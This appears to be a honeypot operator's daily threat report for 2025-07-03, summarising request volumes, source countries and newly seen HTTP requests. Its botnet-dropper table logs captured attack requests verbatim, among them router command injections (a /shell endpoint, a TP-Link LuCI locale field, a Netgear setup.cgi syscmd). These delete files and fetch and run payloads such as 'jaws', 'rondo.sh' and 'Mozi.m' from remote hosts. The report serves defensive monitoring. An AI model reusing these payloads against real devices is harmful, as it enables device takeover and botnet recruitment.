Skip to main content
  1. Daily-Posts/

Report: 2025-07-03

·384 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-03
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 11 new requests that have never been observed before (these were added to the monitored request database.).

A total of 948 requests were recorded during the day, originating from 6 different countries, with a peak of 258 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
USDubai
FRIsrael
PTIsrael
PTIsrael
CNGeorgia
PLGeorgia
FRGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
197.58.209.36GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1
197.45.44.159GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1
41.43.68.122GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1
45.135.194.11GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1
120.86.236.2GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
156.208.121.41GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1521GET /odinhttpcall1751546548 HTTP/1.1
1531GET /OdinHttpCall1751546548 HTTP/1.1
1541GET /Odin/http/call1751546548 HTTP/1.1
1811\x00\x0E\x08\xBE\x1C5\x1F4R\x9C\xDD\x00\x00\x00\x00\x00
1821\x00\x0E8\xBE\x1C5\x1F4R\x9C\xDD\x00\x00\x00\x00\x00
1941GET /socket.io/1/?t=1751501828847 HTTP/1.1
2111GET /odinhttpcall1751505161 HTTP/1.1
2121GET /OdinHttpCall1751505161 HTTP/1.1
2131GET /Odin/http/call1751505161 HTTP/1.1
2921GET /socket.io/1/?t=1751548081391 HTTP/1.1
2931GET /socket.io/1/?t=1751548992026 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0258US
1145DE
288PT
374NL
473FR
540BG
639PL
737GB
825CN
921CA
1018JP
119LT
129UA
137SC
147ZA
156RU
166EG
176BR
185TR
195RO
205SG
215VN
225BE
234IL
244AO
254IN
264GH
274MD
284GE
293HK
303KR
313EE
323KZ
332TW
342HU
352SE
362IE
372NG
381AU
391ES
401GR
411MX
421KG
431CO
441BD
451MK
461IR

Related

Report: 2025-07-02
·450 words
Repport Daily
Report: 2025-07-01
·339 words
Repport Daily
Report: 2025-06-30
·354 words
Repport Daily